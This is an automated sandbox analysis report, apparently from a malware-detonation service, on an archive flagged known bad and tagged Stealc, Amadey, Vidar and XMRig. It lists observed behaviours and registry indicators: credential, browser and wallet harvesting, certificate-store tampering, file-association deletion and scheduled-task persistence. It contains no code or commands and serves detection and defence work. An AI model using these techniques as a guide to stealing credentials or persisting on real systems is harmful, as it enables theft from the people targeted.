Analysis Overview
SHA256
db8d654ded56316bb7d7fac13ef36272abebc07c145791d638f1355bdbbc4d72
Threat Level: Known bad
The file SETAP_9191__PA$$W0rdS~!^!.zip was found to be: Known bad.
Malicious Activity Summary
Stealc
Amadey
xmrig
Vidar
Detect Vidar Stealer
XMRig Miner payload
Downloads MZ/PE file
Manipulates Digital Signatures
Modifies system executable filetype association
Executes dropped EXE
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Registers COM server for autorun
Checks computer location settings
UPX packed file
Loads dropped DLL
Reads data files stored by FTP clients
Checks installed software on the system
Downloads MZ/PE file
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Checks computer location settings
Checks installed software on the system
Checks system information in the registry
Loads dropped DLL
Executes dropped EXE
Drops file in Windows directory
Registers COM server for autorun
Modifies system executable filetype association
Enumerates physical storage devices
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Runs regedit.exe
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: MapViewOfSection
Modifies system certificate store
NTFS ADS
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Uses Volume Shadow Copy WMI provider
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-17 18:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 18:26
Reported
2024-06-17 18:47
Platform
win10v2004-20240508-en
Max time kernel
1199s
Max time network
1201s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Vidar
Downloads MZ/PE file
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\regedit.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\CAFIJKFHIJ.exe | N/A |
| N/A | N/A | C:\ProgramData\CAFHIJDHDG.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\CLSID | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\IconHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\print\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\OpenContainingFolderMenu | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\tabsets | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\Compatibility | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\PintoStartScreen | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\edit\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shellex\DropHandler | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runas | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\{8895b1c6-b41f-4c1c-a562-0d564250836f} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers\Compatibility | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\runasuser\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shellex\ContextMenuHandlers | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\PropertySheetHandlers | C:\Windows\regedit.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0058-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0379-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0021-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0029-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0123-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0279-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0320-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0351-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0247-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0266-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8BD21D40-EC42-11CE-9E0D-00AA006002F3}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0004-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0015-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0211-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0030-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0002E178-0000-0000-C000-000000000046}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0036-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0025-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0396-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0234-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0332-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-FFFF-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0092-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0172-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0277-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0063-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0264-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0320-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0063-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0282-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0159-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0065-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0149-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0001-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0164-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0246-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0162-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00024505-0016-0000-C000-000000000046}\LocalServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0100-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0175-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0399-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0041-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{3BE786A2-0366-4F5C-9434-25CF162E475F}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0126-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0234-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0255-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0096-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0274-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0063-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0251-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0333-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{40B783AC-9C9E-4F73-A1C3-E767FC211B2C}\LocalServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0095-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0200-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0051-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0148-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0107-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0288-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0165-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0009-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0352-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ServiceState\WinHttpAutoProxySvc\Data\cachev3.dat | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Tasks\TWI Cloud Host.job | C:\Windows\SysWOW64\ftp.exe | N/A |
| File created | C:\Windows\Tasks\Watcher Com SH.job | C:\Windows\SysWOW64\ftp.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
